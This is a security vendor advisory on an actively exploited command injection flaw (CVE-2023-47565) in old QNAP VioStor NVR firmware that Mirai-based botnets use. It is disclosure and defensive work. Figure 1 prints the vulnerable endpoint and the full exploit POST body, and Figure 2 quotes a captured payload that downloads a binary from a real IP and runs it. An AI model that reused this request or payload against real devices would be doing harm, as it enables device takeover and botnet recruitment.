Actively Exploited Vulnerability in QNAP VioStor NVR: Fixed, Patches Available
Executive summary
The Akamai Security Intelligence Response Team (SIRT) has issued an additional update to the InfectedSlurs advisory series now that one of the affected vendors has released advisory information and guidance.
The vulnerability within QNAP was identified in the wild and has been given the CVE ID of CVE-2023-47565 with a CVSS v3 score of 8.0.
The malicious payloads captured in the wild install a Mirai-based malware with the intention of creating a distributed denial-of-service (DDoS) botnet.
We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and possible active infections on defender networks.
Need to know
As part of our InfectedSlurs research, the SIRT uncovered a vulnerability in QNAP VioStor network video recorder (NVR) devices that is being actively exploited in the wild. The NVR device is a high-performance network surveillance solution for network-based monitoring of IP cameras, video recording, playback, and remote data access. The vulnerability has been given the CVE ID of CVE-2023-47565 with a CVSS v3 score of 8.0.
The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. In its current configuration, it is utilizing device default credentials in the captured payloads.
The following versions of QNAP VioStor NVR firmware are affected:
VioStor NVR: Versions 5.0.0 and earlier (5.0.0 released June 21, 2014)
QNAP considers these devices discontinued for support; however, the vendor recommends upgrading VioStor firmware on existing devices to the latest available version. This issue had previously been patched, although it was never publicly reported/disclosed. Furthermore, users should change the default passwords on their devices.
Additionally, US-CERT has issued an advisory.
Exploitation observed
Initially, when we reviewed exploit payloads during the InfectedSlurs campaign, we reported only on two zero-day vulnerabilities as the team was unable to positively link the observed exploit to a given device or manufacturer. This made it difficult to confirm the zero-day classification of the exploit.
After deeper examination of various aspects of the exploit and payload, the SIRT believed the target to be QNAP VioStor NVR devices. These devices fit the targeting profile of the campaign and were shipped with weak default credentials (found in their manuals and observed in the exploit). As is the case with the initial two zero-days, the infected devices could facilitate OS command injection vulnerabilities in NTP settings on the affected Internet of Things (IoT) and NVR devices.
After relaying these theories to the US-CERT, they coordinated with Akamai SIRT and QNAP to review the evidence and help confirm the SIRT’s theories. Ultimately, QNAP confirmed the payloads targeted their VioStor devices — which are retired and no longer supported — but only targeted older versions (5.0.0 or earlier) of their previously released firmware.
The vulnerability is exploited by making a POST to the /cgi-bin/server/server.cgi path. The remote code execution (RCE) exists where the argument for SPECIFIC_SERVER is specified (Figure 1).
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
Fig. 1: Attempted exploitation of the RCE via command injection
An example of a captured infection payload is shown in Figure 2.
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
Fig. 2: Captured RCE payload
Basic security practices matter
The basics matter. These observations once again stress the importance of basic security best practices, such as changing default passwords on devices during initial setup. They also highlight the importance of implementing even stronger long-term, proactive security protocols, such as ensuring consistent updating of systems to shield against potential attacks, and occasionally checking in on the systems/devices, especially if they’re exhibiting odd behavior.
Conclusion
Once again, our custom honeypot network deployment has provided valuable insights into cyberattacks, revealing previously unknown vulnerabilities. The presence of default credentials and outdated, unsupported networked systems has emerged as a route for botnet infections. Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.
This finding emphasizes the critical importance of enhancing awareness and education on best practices for IoT, highlighting associated risks for the average consumer; the need for awareness extends beyond consumers and applies to manufacturers of these devices as well. Longer software support cycles and security upon setup, such as forced password changes, are critical to maintaining system security.
Stay tuned
The Akamai Security Intelligence Group will continue to monitor threats such as these and report on them to drive awareness in our customers and the security community in general. For more research, follow us on X, formerly known as Twitter, to keep up-to-date on what we’re seeing out there.
The Akamai SIRT would like to thank CISA, US-CERT, and QNAP for their assistance with our communications, coordination, identification, remediation, and disclosure efforts.
